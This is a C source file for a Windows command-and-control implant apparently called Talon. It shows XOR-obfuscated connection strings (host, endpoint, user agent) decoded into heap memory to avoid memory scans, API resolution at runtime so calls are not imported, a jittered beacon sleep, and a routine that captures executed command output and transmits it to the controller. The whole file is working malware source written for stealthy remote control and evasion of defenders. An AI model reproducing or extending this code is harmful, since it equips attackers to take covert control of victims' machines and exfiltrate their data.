#include <Talon.h>

#include <Core.h>
#include <Config.h>
#include <Package.h>
#include <Command.h>

// --- XOR-obfuscated transport strings (generated by tools/gen_config.py) ---
static const UCHAR CfgUaKey[ 16 ] = {
    0x10, 0x41, 0x80, 0x73, 0xA1, 0x80, 0x9A, 0xED, 0x97, 0xA5, 0x93, 0x92,
    0xA4, 0x55, 0xF5, 0xD2
};
static const UCHAR CfgUaXor[ 220 ] = {
    0x5D, 0x41, 0xEF, 0x73, 0xDB, 0x80, 0xF3, 0xED, 0xFB, 0xA5, 0xFF, 0x92,
    0xC5, 0x55, 0xDA, 0xD2, 0x25, 0x41, 0xAE, 0x73, 0x91, 0x80, 0xBA, 0xED,
    0xBF, 0xA5, 0xC4, 0x92, 0xCD, 0x55, 0x9B, 0xD2, 0x74, 0x41, 0xEF, 0x73,
    0xD6, 0x80, 0xE9, 0xED, 0xB7, 0xA5, 0xDD, 0x92, 0xF0, 0x55, 0xD5, 0xD2,
    0x26, 0x41, 0xAE, 0x73, 0x90, 0x80, 0xA1, 0xED, 0xB7, 0xA5, 0xC4, 0x92,
    0xEB, 0x55, 0xA2, 0xD2, 0x26, 0x41, 0xB4, 0x73, 0x88, 0x80, 0xBA, 0xED,
    0xD6, 0xA5, 0xE3, 0x92, 0xD4, 0x55, 0x99, 0xD2, 0x75, 0x41, 0xD7, 0x73,
    0xC4, 0x80, 0xF8, 0xED, 0xDC, 0xA5, 0xFA, 0x92, 0xD0, 0x55, 0xDA, 0xD2,
    0x25, 0x41, 0xB3, 0x73, 0x96, 0x80, 0xB4, 0xED, 0xA4, 0xA5, 0xA5, 0x92,
    0x84, 0x55, 0xDD, 0xD2, 0x5B, 0x41, 0xC8, 0x73, 0xF5, 0x80, 0xD7, 0xED,
    0xDB, 0xA5, 0xBF, 0x92, 0x84, 0x55, 0x99, 0xD2, 0x79, 0x41, 0xEB, 0x73,
    0xC4, 0x80, 0xBA, 0xED, 0xD0, 0xA5, 0xF6, 0x92, 0xC7, 0x55, 0x9E, 0xD2,
    0x7F, 0x41, 0xA9, 0x73, 0x81, 0x80, 0xD9, 0xED, 0xFF, 0xA5, 0xE1, 0x92,
    0xCB, 0x55, 0x98, 0xD2, 0x75, 0x41, 0xAF, 0x73, 0x98, 0x80, 0xAC, 0xED,
    0xB9, 0xA5, 0xA3, 0x92, 0x8A, 0x55, 0xC1, 0xD2, 0x26, 0x41, 0xB6, 0x73,
    0x95, 0x80, 0xB4, 0xED, 0xA6, 0xA5, 0xA2, 0x92, 0x94, 0x55, 0xD5, 0xD2,
    0x43, 0x41, 0xE1, 0x73, 0xC7, 0x80, 0xFB, 0xED, 0xE5, 0xA5, 0xFA, 0x92,
    0x8B, 0x55, 0xC0, 0xD2, 0x23, 0x41, 0xB7, 0x73, 0x8F, 0x80, 0xA9, 0xED,
    0xA1, 0xA5, 0x93, 0x92
};
static const UCHAR CfgHostKey[ 16 ] = {
    0x9B, 0x1F, 0x1B, 0x55, 0x77, 0x91, 0x19, 0xCC, 0xA7, 0x17, 0x54, 0xDD,
    0x62, 0xB8, 0xC7, 0x16
};
static const UCHAR CfgHostXor[ 28 ] = {
    0xAA, 0x1F, 0x22, 0x55, 0x45, 0x91, 0x37, 0xCC, 0x96, 0x17, 0x62, 0xDD,
    0x5A, 0xB8, 0xE9, 0x16, 0xAB, 0x1F, 0x35, 0x55, 0x45, 0x91, 0x2C, 0xCC,
    0x96, 0x17, 0x54, 0xDD
};
static const UCHAR CfgEpKey[ 16 ] = {
    0x51, 0xDD, 0x91, 0x0A, 0x7D, 0xD2, 0x02, 0xB6, 0x92, 0x65, 0x43, 0x51,
    0xB1, 0xBD, 0xC1, 0x1E
};
static const UCHAR CfgEpXor[ 20 ] = {
    0x38, 0xDD, 0xFF, 0x0A, 0x19, 0xD2, 0x67, 0xB6, 0xEA, 0x65, 0x6D, 0x51,
    0xC1, 0xBD, 0xA9, 0x1E, 0x21, 0xDD, 0x91, 0x0A
};

VOID ConfigDecode( VOID )
{
    // Decode XOR-obfuscated transport strings into heap buffers so the
    // plaintext never sits in .rdata (memory-scan surface).
    PUCHAR Buf = NULL;
    SIZE_T i   = 0;

    Buf = LocalAlloc( LPTR, sizeof( CfgUaXor ) );
    if ( Buf ) {
        for ( i = 0; i < sizeof( CfgUaXor ); i++ )
            Buf[ i ] = CfgUaXor[ i ] ^ CfgUaKey[ i % 16 ];
        Instance.Config.Transport.UserAgent = ( LPWSTR ) Buf;
    }

    Buf = LocalAlloc( LPTR, sizeof( CfgHostXor ) );
    if ( Buf ) {
        for ( i = 0; i < sizeof( CfgHostXor ); i++ )
            Buf[ i ] = CfgHostXor[ i ] ^ CfgHostKey[ i % 16 ];
        Instance.Config.Transport.Host = ( LPWSTR ) Buf;
    }

    Buf = LocalAlloc( LPTR, sizeof( CfgEpXor ) );
    if ( Buf ) {
        for ( i = 0; i < sizeof( CfgEpXor ); i++ )
            Buf[ i ] = CfgEpXor[ i ] ^ CfgEpKey[ i % 16 ];
        Instance.Config.Transport.Endpoint = ( LPWSTR ) Buf;
    }
}

VOID TalonInit()
{
    // Init Connection info
    ConfigDecode();
    Instance.Config.Transport.Port      = CONFIG_PORT;
    Instance.Config.Transport.Secure    = CONFIG_SECURE;

    // Init Win32
    Instance.Win32.RtlRandomEx   = (ULONG (*)(ULONG *)) GetProcAddress( GetModuleHandleA( "ntdll" ), "RtlRandomEx" );
    Instance.Win32.RtlGetVersion = (void (*)(struct _OSVERSIONINFOEXW *)) GetProcAddress( GetModuleHandleA( "ntdll" ), "RtlGetVersion" );
    Instance.Win32.WaitForSingleObjectEx = (DWORD (*)(HANDLE, DWORD, BOOL)) GetProcAddress( GetModuleHandleA( "kernel32" ), "WaitForSingleObjectEx" );

    Instance.Session.AgentID = RandomNumber32();
    Instance.Config.Sleeping = CONFIG_SLEEP;
    Instance.Config.Jitter   = CONFIG_JITTER;

    Dbg( "AgentID     => %x\n", Instance.Session.AgentID );
    Dbg( "Magic Value => %x\n", TALON_MAGIC_VALUE );
}

// Jittered sleep: base +/- Jitter%, via WaitForSingleObjectEx on our own
// process handle (resolved at runtime, not imported) — no fixed cadence and
// no kernel32 Sleep in the call path.
VOID TalonSleep( VOID )
{
    DWORD Base = Instance.Config.Sleeping * 1000;
    DWORD Var  = ( Instance.Config.Jitter * Base ) / 100;
    DWORD T    = Base;

    if ( Var && Instance.Win32.WaitForSingleObjectEx ) {
        ULONG Rand = RandomNumber32() % ( Var + 1 );
        if ( RandomNumber32() & 1 )
            T += Rand;
        else if ( T > Rand )
            T -= Rand;

        Instance.Win32.WaitForSingleObjectEx( GetCurrentProcess(), T, FALSE );
        return;
    }

    Sleep( Base );
}

// Pointer-walk form on purpose: GCC recognises the "while ( s[n] ) n++"
// counting loop as a strlen builtin and emits an orphan msvcrt.dll import
// for it even with -fno-builtin-strlen. This shape compiles to a plain loop.
SIZE_T StrLenA( LPCSTR s )
{
    const char * p = s;
    while ( *p )
        p++;
    return ( SIZE_T )( p - s );
}

VOID AnonPipeRead( HANDLE hSTD_OUT_Read )
{
    PPACKAGE Package         = NULL;
    LPVOID   pOutputBuffer   = NULL;
    UCHAR    buf[ 1025 ]     = { 0 };
    DWORD    dwBufferSize    = 0;
    DWORD    dwRead          = 0;
    BOOL     SuccessFul      = FALSE;

    pOutputBuffer = LocalAlloc( LPTR, sizeof(LPVOID) );

    do
    {
        SuccessFul = ReadFile( hSTD_OUT_Read, buf, 1024, &dwRead, NULL );

        if ( dwRead == 0)
            break;

        pOutputBuffer = LocalReAlloc(
            pOutputBuffer,
            dwBufferSize + dwRead,
            LMEM_MOVEABLE | LMEM_ZEROINIT
        );

        dwBufferSize += dwRead;

        memcpy( pOutputBuffer + ( dwBufferSize - dwRead ), buf, dwRead );
        memset( buf, 0, dwRead );

    } while ( SuccessFul == TRUE );

    Package = PackageCreate( COMMAND_OUTPUT );

    PackageAddBytes( Package, pOutputBuffer, dwBufferSize );
    PackageTransmit( Package, NULL, NULL );

    memset( pOutputBuffer, 0, dwBufferSize );
    LocalFree( pOutputBuffer );
    pOutputBuffer = NULL;
}

ULONG RandomNumber32( VOID )
{
    ULONG Seed = 0;

    Seed = GetTickCount();
    Seed = Instance.Win32.RtlRandomEx( &Seed );
    Seed = Instance.Win32.RtlRandomEx( &Seed );
    Seed = ( Seed % ( LONG_MAX - 2 + 1 ) ) + 2;

    return Seed % 2 == 0 ? Seed : Seed + 1;
}
